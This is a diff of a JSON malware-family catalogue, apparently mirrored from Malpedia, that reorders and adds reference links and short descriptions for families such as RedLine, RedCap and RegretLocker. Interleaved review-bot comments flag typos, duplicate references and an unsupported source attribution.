- "http://www.malwaredigger.com/2015/06/rovnix-payload-and-plugin-analysis.html",
"http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html",
- "https://www.symantec.com/connect/blogs/new-carberp-variant-heads-down-under"
+ "http://www.malwaredigger.com/2015/06/rovnix-payload-and-plugin-analysis.html",
+ "https://www.symantec.com/connect/blogs/new-carberp-variant-heads-down-under",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/rovnix-infects-systems-with-password-protected-macros/"
],
"synonyms": [],
"type": []
@@ -40594,18 +42491,21 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.recordbreaker",
- "https://www.socinvestigation.com/raccoon-infostealer-malware-returns-with-new-ttps-detection-response/",
- "https://cloudsek.com/recordbreaker-the-resurgence-of-raccoon",
- "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
- "https://socprime.com/blog/raccoon-stealer-detection-a-novel-malware-version-2-0-named-recordbreaker-offers-hackers-advanced-password-stealing-capabilities/",
- "https://d01a.github.io/raccoon-stealer/",
- "https://www.youtube.com/watch?v=NI_Yw2t9zoo",
- "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf",
- "https://infosecwriteups.com/raccoon-stealer-v2-malware-analysis-55cc33774ac8",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf",
"https://any.run/cybersecurity-blog/raccoon-stealer-v2-malware-analysis/",
- "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://infosecwriteups.com/raccoon-stealer-v2-malware-analysis-55cc33774ac8",
+ "https://malwarebookreports.com/the-trash-panda-reemerges-from-the-dumpster-raccoon-stealer-v2/",
+ "https://d01a.github.io/raccoon-stealer/",
+ "https://cloudsek.com/recordbreaker-the-resurgence-of-raccoon",
+ "https://www.youtube.com/watch?v=NI_Yw2t9zoo",
"https://www.zscaler.com/blogs/security-research/raccoon-stealer-v2-latest-generation-raccoon-family",
- "https://blog.cyble.com/2022/11/08/massive-youtube-campaign-targeting-over-100-applications-to-deliver-info-stealer/"
+ "https://www.socinvestigation.com/raccoon-infostealer-malware-returns-with-new-ttps-detection-response/",
+ "https://asec.ahnlab.com/en/52072/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf",
+ "https://socprime.com/blog/raccoon-stealer-detection-a-novel-malware-version-2-0-named-recordbreaker-offers-hackers-advanced-password-stealing-capabilities/",
+ "https://blog.cyble.com/2022/11/08/massive-youtube-campaign-targeting-over-100-applications-to-deliver-info-stealer/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf"
],
"synonyms": [],
"type": []
@@ -40626,27 +42526,66 @@
"uuid": "6be9eee4-ee99-4ad6-bee3-2365d7b37a88",
"value": "RedAlpha"
},
+ {
+ "description": "According to Trend Micro, this backdoor receives valid domain credentials as an argument and uses it to log on to the Exchange Server and use it for data exfiltration purposes. The main function of this stage is to take the stolen password from the argument and send it to the attackers as an attachment in an email. We also observed that the threat actors relay these emails via government Exchange Servers using vaild accounts with stolen passwords. ",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redcap",
+ "https://www.trendmicro.com/en_us/research/23/b/new-apt34-malware-targets-the-middle-east.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c1ba2ad1-70d9-4833-ac15-18fb8d0a2408",
+ "value": "RedCap"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redcurl",
+ "https://go.group-ib.com/report-redcurl-awakening-en"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "913d3007-9c2b-4c1c-b3a6-2ecb736bc338",
+ "value": "RedCurl"
+ },
+ {
+ "description": "According to Zscaler ThreatLabz, RedEnergy stealer uses a fake update campaign to target multiple industry verticals and possesses the ability to steal information from various browsers, enabling the exfiltration of sensitive data, while also incorporating different modules for carrying out ransomware activities.The name of the malware was kept due to the common method names observed during the analysis.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redenergy_stealer",
+ "https://www.zscaler.com/blogs/security-research/ransomware-redefined-redenergy-stealer-ransomware-attacks"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b5cbe5c8-8cda-43af-bd67-99dcbd9e0dbf",
+ "value": "RedEnergy Stealer"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.redleaves",
- "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf",
- "https://community.rsa.com/community/products/netwitness/blog/2017/05/03/hunting-pack-use-case-redleaves-malware",
- "https://www.carbonblack.com/2017/05/09/carbon-black-threat-research-dissects-red-leaves-malware-leverages-dll-side-loading/",
- "https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf",
- "https://www.jpcert.or.jp/magazine/acreport-redleaves.html",
- "https://www.cyber.gov.au/sites/default/files/2019-03/msp_investigation_report.pdf",
- "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf",
- "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
"https://www.secureworks.com/research/threat-profiles/bronze-riverside",
- "https://www.us-cert.gov/ncas/alerts/TA17-117A",
- "http://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf",
"http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html",
- "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
- "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Red%20Leaves",
"https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html",
- "http://blog.macnica.net/blog/2017/12/post-8c22.html"
+ "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
+ "https://www.cyber.gov.au/sites/default/files/2019-03/msp_investigation_report.pdf",
+ "https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf",
+ "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Red%20Leaves",
+ "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf",
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
+ "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf",
+ "http://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf",
+ "https://community.rsa.com/community/products/netwitness/blog/2017/05/03/hunting-pack-use-case-redleaves-malware",
+ "https://www.us-cert.gov/ncas/alerts/TA17-117A",
+ "https://www.jpcert.or.jp/magazine/acreport-redleaves.html",
+ "http://blog.macnica.net/blog/2017/12/post-8c22.html",
+ "https://www.carbonblack.com/2017/05/09/carbon-black-threat-research-dissects-red-leaves-malware-leverages-dll-side-loading/"
],
"synonyms": [
"BUGJUICE"
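Review bot: The new RedCap entry's `description` carries a typo, `vaild accounts`, and a trailing space before the closing quote, the RedEnergy Stealer description is missing a space in `activities.The name`, and the new RedCurl entry ships with `"description": ""` even though its second reference appears to be a full Group-IB report the summary could be drawn from. If this file is regenerated from Malpedia the text has to be corrected upstream or the next run reintroduces it; otherwise the RedCap line should end `using valid accounts with stolen passwords.",`. An empty description is the existing convention in this file (the RedLeaves entry that follows has one too), so RedCurl is consistent but is the only one of the three additions a reader cannot act on without leaving the file. The RedAlpha object closes inside this hunk but opens before it, and the RedLeaves object opened here closes after it.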
@@ -40661,92 +42600,97 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer",
- "https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become",
- "https://www.proofpoint.com/us/threat-insight/post/ta505-and-others-launch-new-coronavirus-campaigns-now-largest-collection-attack",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/trellix-global-defenders-invaders-of-the-information-snatchers.html",
- "https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html",
- "https://blog.minerva-labs.com/become-a-vip-victim-with-new-discord-distributed-malware",
- "https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1",
- "https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-they-were-hacked-by-lapsus-extortion-group/",
- "https://insight-jp.nttsecurity.com/post/102i7af/steelclovergoogle",
- "https://unit42.paloaltonetworks.com/bluesky-ransomware/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
- "https://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html",
- "https://www.microsoft.com/security/blog/2022/05/17/in-hot-pursuit-of-cryware-defending-hot-wallets-from-attacks/",
- "https://securityscorecard.pathfactory.com/all/a-detailed-analysis",
- "https://blogs.blackberry.com/en/2021/07/threat-thursday-redline-infostealer",
- "https://www.atomicmatryoshka.com/post/cracking-open-the-malware-pi%C3%B1ata-series-intro-to-dynamic-analysis-with-redlinestealer",
- "https://unit42.paloaltonetworks.com/lapsus-group/",
- "https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem",
- "https://www.youtube.com/watch?v=NI_Yw2t9zoo",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "https://cyber-anubis.github.io/malware%20analysis/redline/",
- "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution",
- "https://www.bitsight.com/blog/tracking-privateloader-malware-distribution-service",
- "https://www.bleepingcomputer.com/news/security/fake-windows-11-upgrade-installers-infect-you-with-redline-malware/",
- "https://ke-la.com/information-stealers-a-new-landscape/",
- "https://n1ght-w0lf.github.io/tutorials/yara-for-config-extraction/",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://asec.ahnlab.com/en/35981/",
- "https://securityscorecard.com/research/detailed-analysis-redline-stealer",
- "https://isc.sans.edu/forums/diary/RedLine+Stealer+Delivered+Through+FTP/28258/",
- "https://blog.rootshell.be/2022/01/20/sans-isc-redline-stealer-delivered-through-ftp/",
- "https://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html",
- "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html",
- "https://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two",
- "https://dr4k0nia.github.io/posts/Unpacking-RedLine-Stealer/",
- "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
- "https://blog.netlab.360.com/purecrypter",
- "https://www.esentire.com/blog/redline-stealer-masquerades-as-photo-editing-software",
- "https://threatresearch.ext.hp.com/redline-stealer-disguised-as-a-windows-11-upgrade/",
- "https://intel471.com/blog/privateloader-malware",
- "https://www.secureworks.com/research/darktortilla-malware-analysis",
- "https://asec.ahnlab.com/ko/25837/",
- "https://blog.avast.com/adobe-acrobat-sign-malware",
- "https://www.qualys.com/docs/whitepapers/qualys-wp-fake-cracked-software-caught-peddling-redline-stealers-v220606.pdf",
- "https://embee-research.ghost.io/redline-stealer-basic-static-analysis-and-c2-extraction/",
- "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns",
- "https://medium.com/s2wblog/deep-analysis-of-redline-stealer-leaked-credential-with-wcf-7b31901da904",
- "https://www.bitdefender.com/blog/labs/redline-stealer-resurfaces-in-fresh-rig-exploit-kit-campaign/",
- "https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-malware/",
- "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
- "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/",
- "https://blog.minerva-labs.com/redline-stealer-masquerades-as-telegram-installer",
- "https://securelist.com/self-spreading-stealer-attacks-gamers-via-youtube/107407/",
- "https://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns",
- "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf",
- "https://www.bitdefender.com/files/News/CaseStudies/study/415/Bitdefender-PR-Whitepaper-RedLine-creat6109-en-EN.pdf",
- "https://securelist.com/malvertising-through-search-engines/108996/",
- "https://thehackernews.com/2022/03/microsoft-and-okta-confirm-breach-by.html",
"https://www.zscaler.com/blogs/security-research/making-victims-pay-infostealer-malwares-mimick-pirated-software-download",
- "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a",
- "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://blogs.blackberry.com/en/2021/07/threat-thursday-redline-infostealer",
+ "https://cyber-anubis.github.io/malware%20analysis/redline/",
+ "https://securelist.com/self-spreading-stealer-attacks-gamers-via-youtube/107407/",
+ "https://www.atomicmatryoshka.com/post/cracking-open-the-malware-pi%C3%B1ata-series-intro-to-dynamic-analysis-with-redlinestealer",
+ "https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1",
+ "https://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns",
"https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://www.bleepingcomputer.com/news/security/massive-campaign-uses-youtube-to-push-password-stealing-malware/",
- "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/",
- "https://www.netskope.com/blog/redline-stealer-campaign-using-binance-mystery-box-videos-to-spread-github-hosted-payload",
- "https://research.openanalysis.net/dotnet/xorstringsnet/agenttesla/2023/04/16/xorstringsnet.html",
- "https://www.bleepingcomputer.com/news/security/fake-valorant-cheats-on-youtube-infect-you-with-redline-stealer/",
- "https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html",
- "https://www.bleepingcomputer.com/news/security/redline-info-stealing-malware-spread-by-folding-home-phishing/",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout",
- "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/",
- "https://muha2xmad.github.io/malware-analysis/fullredline/",
- "https://bartblaze.blogspot.com/2021/06/digital-artists-targeted-in-redline.html",
- "https://go.recordedfuture.com/hubfs/reports/mtp-2021-1014.pdf",
- "https://www.proofpoint.com/us/threat-insight/post/new-redline-stealer-distributed-using-coronavirus-themed-email-campaign",
- "https://asec.ahnlab.com/en/30445/",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore",
- "https://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882",
+ "https://thehackernews.com/2022/03/microsoft-and-okta-confirm-breach-by.html",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
"https://blog.morphisec.com/syk-crypter-discord",
+ "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf",
+ "https://www.bleepingcomputer.com/news/security/redline-info-stealing-malware-spread-by-folding-home-phishing/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become",
+ "https://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two",
+ "https://www.netskope.com/blog/redline-stealer-campaign-using-binance-mystery-box-videos-to-spread-github-hosted-payload",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/",
"https://blog.morphisec.com/google-ppc-ads-deliver-redline-taurus-and-mini-redline-infostealers",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://krebsonsecurity.com/2022/03/a-closer-look-at-the-lapsus-data-extortion-group/",
+ "https://unit42.paloaltonetworks.com/lapsus-group/",
+ "https://www.bleepingcomputer.com/news/security/fake-valorant-cheats-on-youtube-infect-you-with-redline-stealer/",
+ "https://asec.ahnlab.com/ko/25837/",
+ "https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152",
+ "https://blog.rootshell.be/2022/01/20/sans-isc-redline-stealer-delivered-through-ftp/",
+ "https://web.archive.org/web/20230606224056/https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152",
+ "https://blog.minerva-labs.com/redline-stealer-masquerades-as-telegram-installer",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/415/Bitdefender-PR-Whitepaper-RedLine-creat6109-en-EN.pdf",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns",
+ "https://asec.ahnlab.com/en/30445/",
+ "https://www.microsoft.com/security/blog/2022/05/17/in-hot-pursuit-of-cryware-defending-hot-wallets-from-attacks/",
+ "https://go.recordedfuture.com/hubfs/reports/mtp-2021-1014.pdf",
+ "https://www.bleepingcomputer.com/news/security/fake-windows-11-upgrade-installers-infect-you-with-redline-malware/",
+ "https://www.bleepingcomputer.com/news/security/massive-campaign-uses-youtube-to-push-password-stealing-malware/",
+ "https://blog.eclecticiq.com/redline-stealer-variants-demonstrate-a-low-barrier-to-entry-threat",
+ "https://bartblaze.blogspot.com/2021/06/digital-artists-targeted-in-redline.html",
+ "https://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882",
+ "https://securityscorecard.pathfactory.com/all/a-detailed-analysis",
+ "https://ke-la.com/information-stealers-a-new-landscape/",
+ "https://www.secureworks.com/research/darktortilla-malware-analysis",
+ "https://isc.sans.edu/forums/diary/RedLine+Stealer+Delivered+Through+FTP/28258/",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://embee-research.ghost.io/redline-stealer-basic-static-analysis-and-c2-extraction/",
+ "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html",
"https://securityaffairs.co/wordpress/129391/hacking/lapsus-gang-compromised-microsoft-employees-account.html",
+ "https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html",
+ "https://insight-jp.nttsecurity.com/post/102i7af/steelclovergoogle",
+ "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
+ "https://blog.minerva-labs.com/become-a-vip-victim-with-new-discord-distributed-malware",
+ "https://intel471.com/blog/privateloader-malware",
+ "https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-malware/",
+ "https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem",
+ "https://www.esentire.com/blog/redline-stealer-masquerades-as-photo-editing-software",
+ "https://unit42.paloaltonetworks.com/bluesky-ransomware/",
+ "https://muha2xmad.github.io/malware-analysis/fullredline/",
+ "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution",
+ "https://n1ght-w0lf.github.io/tutorials/yara-for-config-extraction/",
+ "https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore",
+ "https://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html",
+ "https://securityscorecard.com/research/detailed-analysis-redline-stealer",
+ "https://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html",
+ "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/",
+ "https://www.bitdefender.com/blog/labs/redline-stealer-resurfaces-in-fresh-rig-exploit-kit-campaign/",
+ "https://www.proofpoint.com/us/threat-insight/post/new-redline-stealer-distributed-using-coronavirus-themed-email-campaign",
+ "https://www.qualys.com/docs/whitepapers/qualys-wp-fake-cracked-software-caught-peddling-redline-stealers-v220606.pdf",
+ "https://krebsonsecurity.com/2022/03/a-closer-look-at-the-lapsus-data-extortion-group/",
+ "https://securelist.com/malvertising-through-search-engines/108996/",
+ "https://dr4k0nia.github.io/posts/Unpacking-RedLine-Stealer/",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://www.bitsight.com/blog/tracking-privateloader-malware-distribution-service",
+ "https://www.secureworks.com/research/the-growing-threat-from-infostealers",
"https://team-cymru.com/blog/2022/05/25/bablosoft-lowering-the-barrier-of-entry-for-malicious-actors/",
+ "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md",
+ "https://research.openanalysis.net/dotnet/xorstringsnet/agenttesla/2023/04/16/xorstringsnet.html",
+ "https://blog.netlab.360.com/purecrypter",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/trellix-global-defenders-invaders-of-the-information-snatchers.html",
+ "https://threatresearch.ext.hp.com/redline-stealer-disguised-as-a-windows-11-upgrade/",
+ "https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html",
"https://www.fortinet.com/blog/threat-research/omicron-variant-lure-used-to-distribute-redline-stealer",
- "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md"
+ "https://medium.com/s2wblog/deep-analysis-of-redline-stealer-leaked-credential-with-wcf-7b31901da904",
+ "https://asec.ahnlab.com/en/35981/",
+ "https://blog.avast.com/adobe-acrobat-sign-malware",
+ "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a",
+ "https://www.youtube.com/watch?v=NI_Yw2t9zoo",
+ "https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-they-were-hacked-by-lapsus-extortion-group/",
+ "https://www.proofpoint.com/us/threat-insight/post/ta505-and-others-launch-new-coronavirus-campaigns-now-largest-collection-attack",
+ "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf"
],
"synonyms": [],
"type": []
@@ -40805,8 +42749,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.redsalt",
"https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/twoforonefinal.pdf",
- "https://twitter.com/ItsReallyNick/status/1136502701301346305",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s01-hunting-for-platinum.pdf"
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s01-hunting-for-platinum.pdf",
+ "https://twitter.com/ItsReallyNick/status/1136502701301346305"
],
"synonyms": [
"Dipsind"
@@ -40821,8 +42765,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.redshawl",
- "https://content.fireeye.com/apt/rpt-apt38",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf"
+ "https://securelist.com/lazarus-under-the-hood/77908/",
+ "https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf",
+ "https://content.fireeye.com/apt/rpt-apt38"
],
"synonyms": [],
"type": []
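Review bot: The RedLine Stealer `refs` array now lists the same article twice, because both `https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152` and its Wayback snapshot `https://web.archive.org/web/20230606224056/https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152` are added, so anything that counts or deduplicates references sees one source as two. Keep one of them — the archived copy if the concern is the live post changing or disappearing — and the redshawl hunk below does something similar by adding `https://securelist.com/lazarus-under-the-hood/77908/` beside the already-listed Kaspersky PDF that appears to be the same report. Only five of the 84 added lines here are genuinely new references (the two apophis links, EclecticIQ, the Secureworks infostealer piece and the Spamhaus 2023 Q2 update); the rest re-emit references the hunk also removes, which is the ordering churn raised on the ratel hunk. The enclosing entry object opens before this hunk.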
@@ -40874,13 +42820,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.regeorg",
- "https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/",
- "https://github.com/sensepost/reGeorg",
- "https://sensepost.com/discover/tools/reGeorg/",
"https://www.secureworks.com/blog/ransomware-deployed-by-adversary",
"https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF",
"https://www.secureworks.com/research/samsam-ransomware-campaigns",
- "https://www.welivesecurity.com/2022/09/06/worok-big-picture/"
+ "https://sensepost.com/discover/tools/reGeorg/",
+ "https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/",
+ "https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/",
+ "https://www.welivesecurity.com/2022/09/06/worok-big-picture/",
+ "https://github.com/sensepost/reGeorg"
],
"synonyms": [],
"type": []
@@ -40894,12 +42841,12 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.regin",
"https://securelist.com/big-threats-using-code-similarity-part-1/97239/",
- "https://www.epicturla.com/previous-works/hitb2020-voltron-sta",
- "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/regin-top-tier-espionage-tool-15-en.pdf",
- "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf",
"https://www.youtube.com/watch?v=jeLd-gw2bWo",
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
+ "https://www.epicturla.com/previous-works/hitb2020-voltron-sta",
"https://www.kaspersky.com/blog/regin-apt-most-sophisticated/6852/",
+ "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/regin-top-tier-espionage-tool-15-en.pdf",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf",
"https://securelist.com/regin-nation-state-ownage-of-gsm-networks/67741/"
],
"synonyms": [],
@@ -40909,13 +42856,13 @@
"value": "Regin"
},
{
- "description": "",
+ "description": "According to PCrisk, RegretLocker is malicious software classified as ransomware. Systems infected with this malware have their data encrypted and users receive ransom demands for decryption. During the encryption process, all affected files are appended with the \".mouse\" extension.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.regretlocker",
- "http://chuongdong.com/reverse%20engineering/2020/11/17/RegretLocker/",
+ "https://twitter.com/malwrhunterteam/status/1321375502179905536",
"https://www.bleepingcomputer.com/news/security/new-regretlocker-ransomware-targets-windows-virtual-machines/",
- "https://twitter.com/malwrhunterteam/status/1321375502179905536"
+ "http://chuongdong.com/reverse%20engineering/2020/11/17/RegretLocker/"
],
"synonyms": [],
"type": []
@@ -40943,8 +42890,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rekoobew",
- "https://www.mandiant.com/resources/fin13-cybercriminal-mexico",
- "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/"
+ "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/",
+ "https://www.mandiant.com/resources/fin13-cybercriminal-mexico"
],
"synonyms": [
"tinyshell.win",
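Review bot: The new RegretLocker `description` opens with `According to PCrisk, ...`, but none of the entry's four `refs` points at PCrisk, so the attribution cannot be followed from the entry itself; the other descriptions added in this update (RedCap citing Trend Micro, RedEnergy Stealer citing Zscaler) do list the source they name. Either add the PCrisk write-up to `refs` or reword the sentence to cite one of the references that are listed. If the text is mirrored from Malpedia, the correction belongs upstream so the next regeneration does not undo it. The RegretLocker object closes outside this hunk.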
@@ -41017,85 +42964,90 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos",
- "https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service",
- "https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html",
